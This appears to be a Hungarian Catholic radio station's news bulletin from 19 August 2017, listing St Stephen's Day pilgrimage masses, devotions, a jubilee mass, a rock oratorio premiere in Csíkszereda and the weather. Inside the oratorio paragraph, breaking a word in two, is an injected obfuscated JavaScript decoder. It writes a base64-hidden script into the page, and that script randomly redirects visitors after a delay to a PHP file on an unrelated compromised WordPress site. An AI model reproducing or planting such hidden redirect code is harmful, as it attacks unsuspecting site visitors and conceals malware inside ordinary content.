2017. augusztus 19. – Hírek és programajánló

H Í R E K   D É L B E N

Mária-áhítat Kovásznán
Minden hónap harmadik szombatján Mária áhítatot tartanak Kovásznán szentmisével, rózsafüzérrel és gyertyás körmenettel. Hívják és várják a háromszékieket ma este hét órakor a helyi plébániatemplomba. Az imaalkalmat rádiónk élő adásban közvetíti.

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében holnap Kolozsváron, a monostori templomban tartják az örökös szentségimádási napot. A nagyváradi egyházmegyében Érmihályfalván és Hagymádfalván lesz a híveknek lehetősége az örökös szentségimádásába bekapcsolódni. Járuljunk az Oltáriszentségben jelen levő Krisztus elé, imádjuk Őt és engedjük, hogy jelenléte betöltse szívünket, egész lényünket.

Szent István-napi búcsúk
A gyulafehérvári főegyházmegyében Perkőn augusztus 20-án, holnap tartják a Szent István-napi búcsút. Délelőtt háromnegyed tizenegykor a kézdiszentléleki templommal szemben lévő téren felavatják a Szent László-szobrot. Utána elindul a zarándokok körmenete. Útközben elvégzik a keresztúti ájtatosságot. Az ünnepi szentmise, melynek szónoka Tamás József püspök, 12:20-kor kezdődik. A liturgikus zenei szolgálatot a kézdiszentléleki egyházi énekkar biztosítja, Dávid István kántor vezénylése alatt.
A borzonti Szent István-napi búcsús szentmisét szintén holnap déli tizenkét órától tartják.
Hargitafürdőn holnap délben fél egy órakor tartják a pálos atyák a Szent István búcsút. A főcelebráns és szónok Csóka János, pálos tartományfőnök a szentmise keretében megáldja a templomkertben felújított parkot.
Székelyszentkirályon ugyancsak holnap fél egy órakor kezdődik a Szent István napi búcsús szentmise. A szentbeszédet Urbán Erik ferences atya, a csíksomlyói kegytemplom igazgatója tartja.
Csíkajnádon szintén holnap fél egy órakor várják a híveket Szent István-napi búcsús szentmisére. Az ünnep szónoka Salamon József gyimesbükki plébános lesz.
Hidegségen a Szent István búcsú holnap fél egy órakor kezdődik. A szentmise szónoka Ferencz István nyugalmazott plébános.
Ugyancsak holnap fél egy órakor tartják a búcsút Csíkszentkirályon is. A szentmisén Kémenes Lóránt türi plébános prédikál.
Kolozsváron, a Donát úti Szent István-templom búcsúünnepe holnap délután hat órakor kezdődik. Szentbeszédet mond Szabó Gyula, nyugalmazott plébános.
A medgyesi Szent István-templom búcsúját szintén holnap délután hat órakor ünneplik. A szentmisén Biró Nándor-Alfonz, nagyszebeni lelkész prédikál.
A szatmári egyházmegyében Nagybányán ünnepelnek búcsút Szent István napján. Délután hat órától rózsafüzér lesz, utána este hét órától kezdődik a szabadtéri szentmise, a Szentháromság templom előtti téren. Ünnepi szónok Schupler Tibor batizi plébános.
A nagyváradi egyházmegyében holnap déli tizenkét órakor Biharon Ozsváth József székelyhídi plébános, Nagyszalontán Kiss Márton bélfenyéri plébános, Szentjobbon Nagy Tibor szilágycsehi plébános, Királydarócon pedig Tímár Sándor Asztrik kaplonyi ferences házfőnök tart ünnepi búcsús szentmisét.

Szent Ilona napja Vágásban
A vágási templom védőszentjét, Szent Ilonát augusztus 20-án ünneplik. A búcsús szentmise holnap délben fél egy órakor kezdődik, ünnepi szónok Sebestyén Domokos oroszhegyi aranymisés plébános.

Szentmise a Vártemplomban
Holnap délután négy órakor a nagyváradi székeskáptalan tagjai, a jelenlevő papokkal és hívekkel közösen, esti dicsérettel egybekötött szentmisét végeznek a nagyváradi Vártemplomban. A szentmise után a jelenlévők leróhatják tiszteletüket Szent István király ereklyéje előtt. A szentmise főcelebránsa és szónoka Fodor József általános helynök lesz. 

Gyémántmise Csíksomlyón
Márk József ferences atya hálát adva 60 év papi szolgálatáért augusztus 20-án, holnap este hét órakor a csíksomlyói kegytemplomban mutatja be gyémántmiséjét. József atya 47 éve szolgál a csíksomlyói kegyhelyen. Imádkozzunk érette kérve Isten áldását további szolgálatára. A gyémántmisét rádiónk élő adásban közvetíti.

„Szent László, légy velünk!” – rockoratórium és táncjáték
Az idei jubileumi év apropóján, a szent királyról szóló rockoratórium és táncjáték készül Szent László, légy velünk! címmel, amely Erdély védőszentjének rendkívül erős, pozitív személyiségét, nagyszerű cselekedeteit, és a köré fűződő legendakört fogja össze, óriásprodukcióként zenében, dalban, táncban. E nagyszabású produkció megírására és bemutatására a 30 éves jubielumát ünneplő Role zenekar vállalkozott. A grfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andiózus bemutató előadás holnap este kilenc órától lesz Csíkszeredában, a Szabadság téren, melyre minden érdeklődőt várnak. 

Hétvégi szentmiseközvetítések
Ma este hét órától a kovásznai templomból közvetítjük a Mária-áhitat programját. Holnap két ünnepi szentmisét is hallhatnak: déli tizenkét órától Biharról közvetítünk búcsús szentmisét, este hét órától pedig Csíksomlyóról a gyémántmisét.

Időjárás: Ma délután meleg időre számíthatunk, enyhe széllel és növekvő felhőzettel. A maximumok 29-36 fok között alakulnak. Holnapra egy hidegfront éri el a Kárpát Medencét, sok helyen számíthatunk záporra, zivatarra.  Hajnalban 8-17, napközben 28-34 fok között alakul a levegő hőmérséklete. 

MRE - Hírszolgálat, 2017. augusztus 19.

About the author

maradmin

Leave a Comment